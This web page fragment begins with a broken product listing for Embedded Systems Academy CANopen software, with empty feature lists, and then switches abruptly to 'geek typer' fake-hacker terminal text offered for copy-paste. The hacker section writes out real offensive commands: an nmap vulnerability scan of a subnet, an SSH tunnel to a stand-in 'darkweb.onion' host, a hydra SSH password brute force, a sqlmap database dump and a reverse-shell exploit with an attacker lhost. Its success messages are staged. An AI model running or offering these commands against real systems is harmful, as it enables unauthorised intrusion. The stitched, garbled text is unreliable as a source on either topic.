PEAK-System
Cactus Technologies
All versions support:
In addition, the Professional version offers:
In addition, the Ultimate version offers:
Detailed information on this and other software products from Embedded Systems Academy can be found on the website www.canopenmagic.com. On request, we also sell other software products of Embedded Systems Academy.
Prices for single use and installation with computer-bound registration process via Internet. The software is delivered electronically.
Therefore, please enter the e-mail address of the intended recipient in the delivery address or in the comments when ordering.
$> sudo nmap -sS -A -O --script vuln 192.168.1.0/24 && ssh -D 8080 root@darkweb.onion -N &> ~/logs/scan.log
┌─────────────────────────────────────────────────────────┐ │ GEEK TYPER v2.3.7 || ROOT ACCESS MODE || SECURE │ ├─────────────────────────────────────────────────────────┤ │ > Initializing kernel modules... [ DONE ] │ │ > Spoofing MAC address... 0x7F:3A:2B:9D │ │ > Bypassing firewall ruleset... [ SUCCESS ] │ │ > Encrypting backchannel... AES-256-CBC │ │ > Tracing IP: 185.234.72.19... TOR EXIT NODE │ │ > Decrypting payload... *********** │ │ │ │ ACCESS GRANTED. WELCOME, USER. │ │ │ │ [ root@darkstar ~ ]$ _ │ └─────────────────────────────────────────────────────────┘ For a (copy-paste line by line): geek typer terminal
> ssh darknet@anonymous.hack > root@anonymous:~$ sudo su > Password: **************** > [sudo] authentication successful. > root@anonymous:~# nmap -sS -A 10.0.2.15 > Starting Nmap 7.80 ( https://nmap.org ) > Host is up (0.00034s latency). > PORT STATE SERVICE VERSION > 22/tcp open ssh OpenSSH 8.2p1 > 80/tcp open http Apache httpd 2.4.41 > 443/tcp open ssl/http nginx/1.18.0 > 8080/tcp open http-proxy > root@anonymous:~# hydra -l admin -P rockyou.txt ssh://10.0.2.15 > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "123456" > [ATTEMPT] target 10.0.2.15 - login "admin" - pass "password" > [SUCCESS] login: admin pass: letmein > root@anonymous:~# sqlmap -u "http://target.site/page?id=1" --dbs > Parameter: id (GET) – vulnerable to UNION and boolean-based blind > available databases [3]: > [*] information_schema > [*] users_db > [*] corporate_data > root@anonymous:~# ./exploit --payload reverse_shell --lhost 192.168.1.47 > [!] Meterpreter session opened on port 4444 > [*] Sending shellcode... > [✓] Connection established. > root@anonymous:~# whoami > root > root@anonymous:~# echo "HACK THE PLANET" | lolcat > HACK THE PLANET > root@anonymous:~# exit > logout > Connection closed by remote host. > $ If you want a for quick copy-paste into a terminal-like chat: $> sudo nmap -sS -A -O --script vuln 192